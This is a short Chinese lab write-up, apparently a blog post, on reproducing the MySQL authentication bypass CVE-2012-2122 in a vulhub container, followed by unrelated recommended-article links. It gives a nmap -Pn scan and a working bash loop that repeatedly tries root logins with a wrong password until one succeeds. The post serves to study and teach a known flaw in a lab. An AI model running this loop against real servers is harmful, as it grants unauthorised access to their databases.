CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
deephub4 分钟前
构建有记忆的 AI Agent:SQLite 存储 + 向量检索完整方案示例
数据库·人工智能·sqlite·大语言模型·向量检索·智能体
无敌最俊朗@8 分钟前
SQlite:列级,表级约束
数据库
不剪发的Tony老师2 小时前
Mathesar:一款基于PostgreSQL的在线电子表格
数据库·postgresql·电子表格
万邦科技Lafite5 小时前
京东按图搜索京东商品(拍立淘) API (.jd.item_search_img)快速抓取数据
开发语言·前端·数据库·python·电商开放平台·京东开放平台
金仓拾光集6 小时前
__金仓数据库平替MongoDB实战:从多模兼容到高可用落地__
数据库·mongodb·数据库平替用金仓·金仓数据库
北邮-吴怀玉6 小时前
6.1.2.2 大数据方法论与实践指南-离线任务SQL 任务开发规范
大数据·数据库·sql
流烟默6 小时前
MongoDB索引创建语法分析
数据库·mongodb
金仓拾光集6 小时前
__国产化转型实战:制造业供应链物流系统从MongoDB至金仓数据库迁移全指南__
数据库·mongodb·数据库平替用金仓·金仓数据库
初学者_xuan6 小时前
零基础新手小白快速了解掌握服务集群与自动化运维(十五)Redis模块-Redis数据库基础
运维·数据库·自动化
小马哥编程6 小时前
【软考架构】案例分析:MongoDB 如何存储非结构化数据以及其矢量化存储的优点。
数据库·mongodb·架构